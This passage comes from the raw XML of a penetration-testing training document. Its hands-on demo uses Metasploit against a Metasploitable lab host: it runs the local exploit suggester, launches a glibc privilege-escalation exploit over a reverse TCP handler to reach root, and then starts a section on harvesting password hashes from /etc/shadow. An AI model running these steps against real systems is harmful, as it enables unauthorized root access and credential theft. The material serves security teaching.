      </w:r>
    </w:p>
    <w:p w14:paraId="088A4FFB" w14:textId="705A88C1" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3D591C" w14:textId="314C6F40" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:r>
        <w:t>Suppose you successfully obtained a Meterpreter session with www-data privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64972E47" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; sessions -i 87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D74013" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Starting interaction with 87...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1CA0E" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57715AEB" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9CF6D" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server username: uid=33, gid=33, euid=33, egid=33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D574B36" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ED1C73" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Computer     : metasploitable.localdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B694CB4" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B088EF" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Architecture : i686</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C81EFE6" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>BuildTuple   : i486-linux-musl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C54B507" w14:textId="4CF7C7AA" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter  : x86/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768A805" w14:textId="77777777" w:rsidR="007F2284" w:rsidRDefault="007F2284" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B3ABB5" w14:textId="69E37E14" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Search for the local exploit suggester and use it on the correct session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE49D1" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; search local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6722D27B" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF1A6AE" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A942D8F" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4CAAD" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A000EE9" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Name                                      Disclosure Date  Rank    Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48E618" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----                                      ---------------  ----    -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB024AD" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   post/multi/recon/local_exploit_suggester                   normal  Multi Recon Local Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427BC15C" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   post/multi/recon/local_exploit_suggester                   normal  Multi Recon Local Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5CF53" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   post/multi/recon/local_exploit_suggester                   normal  Multi Recon Local Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DF6204" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   post/multi/recon/local_exploit_suggester                   normal  Multi Recon Local Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C01C82" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A124DD1" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B40134F" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; use post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04318303" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf post(multi/recon/local_exploit_suggester) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BBE3D" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783E142E" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (post/multi/recon/local_exploit_suggester):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009929D1" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE5E935" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name             Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530452A" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----             ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA0FFF" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SESSION          8                yes       The session to run this module on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A48085" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E32611" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D38130C" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf post(multi/recon/local_exploit_suggester) &gt; set session 87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F8807" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>session =&gt; 87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F525820" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050B8677" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf post(multi/recon/local_exploit_suggester) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632379B" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8C0DDF" w14:textId="2F2AF854" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Collecting local exploits for x86/linux...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD18AC" w14:textId="02CD083F" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - 21 exploit checks are being tried...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA877A6" w14:textId="42C91B55" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02C3D6" w14:textId="4FDD3AE0" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111FF336" w14:textId="2C8981F7" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D99BD7" w14:textId="13D42EAF" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Post module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E56BC" w14:textId="77777777" w:rsidR="007F2284" w:rsidRDefault="007F2284" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E0FB63B" w14:textId="5234BF5E" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The target seems vulnerable to three exploits. Try the first one:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B171C35" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf post(multi/recon/local_exploit_suggester) &gt; use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A21CDB" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2639E44A" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) &gt; set session 87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F79F7C" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>session =&gt; 87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE1F27" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) &gt; set LPORT 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE0378" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LPORT =&gt; 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07E670" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D203A58" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486B0BC6" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.21.10:4445 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAF818C" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] The target appears to be vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31CD7D" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CDC56" w14:textId="47A50689" w:rsidR="005F276F" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F276F">
        <w:t xml:space="preserve">[*] Meterpreter session 89 opened (192.168.21.10:4445 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidR="005F276F">
        <w:t>:56047) at 2018-07-09 09:34:53 -0500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0DAF3A" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0811B2" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9BBA65" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server username: uid=0, gid=0, euid=0, egid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AA1A2" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27C819" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Computer     : metasploitable.localdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073457DA" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B07E7" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Architecture : i686</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B3495" w14:textId="77777777" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>BuildTuple   : i486-linux-musl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A285E0B" w14:textId="7A2E6AF1" w:rsidR="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter  : x86/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C9ABBD" w14:textId="36B7BB4A" w:rsidR="005F276F" w:rsidRPr="005F276F" w:rsidRDefault="005F276F" w:rsidP="005F276F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>As you can see</w:t>
      </w:r>
      <w:r w:rsidR="009C4210">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007F2284">
        <w:t xml:space="preserve"> it worked </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="007F2284">
        <w:t>privileges are now root</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40051BFA" w14:textId="6322849A" w:rsidR="00F41E0F" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Information gathering</w:t>
      </w:r>
      <w:r w:rsidR="00283AA5">
        <w:t xml:space="preserve"> (pivoting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3DE6E1" w14:textId="636EADE9" w:rsidR="002F7918" w:rsidRDefault="002F7918" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7918">
        <w:t>Once an attacker obtained a session on the target machine, he will start to look for information such as config</w:t>
      </w:r>
      <w:r w:rsidR="00B34281">
        <w:t>uration</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7918">
        <w:t xml:space="preserve"> files, history, passwords etc. that could lead to new machines and network</w:t>
      </w:r>
      <w:r w:rsidR="00076384">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7918">
        <w:t xml:space="preserve"> to compromise.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEE9D4" w14:textId="4922F78A" w:rsidR="006C1163" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Getting password and hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E1023" w14:textId="4DD1D270" w:rsidR="007360C6" w:rsidRDefault="002F7918" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Looking for passwords and hashes is one of the first thing that will be </w:t>
      </w:r>
      <w:r w:rsidR="00B34281">
        <w:t>done,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as it could be a</w:t>
      </w:r>
      <w:r w:rsidR="00B34281">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B34281">
        <w:t>easy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> way to get domain admin if admin credentials are gathered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582F955" w14:textId="6EADA7AA" w:rsidR="0071529A" w:rsidRDefault="0071529A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Password storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17060CE9" w14:textId="41133D76" w:rsidR="0071529A" w:rsidRDefault="0071529A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29A2CC" w14:textId="3BE243CB" w:rsidR="0071529A" w:rsidRDefault="0071529A" w:rsidP="0071529A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Historically, Linux stored passwords in “</w:t>
      </w:r>
      <w:r w:rsidR="00CA452C">
        <w:t>/etc/passw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d” file. However, this file contain </w:t>
      </w:r>
      <w:r w:rsidR="00E73989">
        <w:t>other user-related information than passwords and must be world readable for system tools to function properly.</w:t>
      </w:r>
      <w:r w:rsidR="00D736A8">
        <w:t xml:space="preserve"> It means </w:t>
      </w:r>
      <w:r w:rsidR="00F14230">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00D736A8">
        <w:t>anyone with an access on the system could see passwords hashes.</w:t>
      </w:r>
      <w:r w:rsidR="00CA452C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4816A" w14:textId="2609019B" w:rsidR="00CA452C" w:rsidRDefault="00CD2851" w:rsidP="00CA452C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA452C">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00CA452C" w:rsidRPr="00CA452C">
        <w:t xml:space="preserve"> “/etc/shadow/” file has been introduced to compensate this information disclosure. </w:t>
      </w:r>
      <w:r w:rsidR="00CA452C">
        <w:t>Users’ information are still in the “/etc/</w:t>
      </w:r>
      <w:r w:rsidR="00F14230">
        <w:t xml:space="preserve">passwd” which is world </w:t>
      </w:r>
      <w:r w:rsidR="00F14230">
        <w:lastRenderedPageBreak/>
        <w:t>readable. P</w:t>
      </w:r>
      <w:r w:rsidR="00FE40FE" w:rsidRPr="00CA452C">
        <w:t xml:space="preserve">asswords, </w:t>
      </w:r>
      <w:r w:rsidR="00F14230">
        <w:t>on the other hands</w:t>
      </w:r>
      <w:r w:rsidR="00FE40FE">
        <w:t xml:space="preserve"> are no longer </w:t>
      </w:r>
      <w:r w:rsidR="00CA452C" w:rsidRPr="00CA452C">
        <w:t xml:space="preserve">stored in </w:t>
      </w:r>
      <w:r w:rsidR="00F14230">
        <w:t>this file</w:t>
      </w:r>
      <w:r w:rsidR="008909AB">
        <w:t xml:space="preserve"> but in “/etc/shadow”.</w:t>
      </w:r>
      <w:r w:rsidR="00D256DC">
        <w:t xml:space="preserve"> A typical shadow entry looks </w:t>
      </w:r>
      <w:r w:rsidR="000D47BA">
        <w:t>as follows</w:t>
      </w:r>
      <w:r w:rsidR="00D256DC">
        <w:t>:</w:t>
      </w:r>
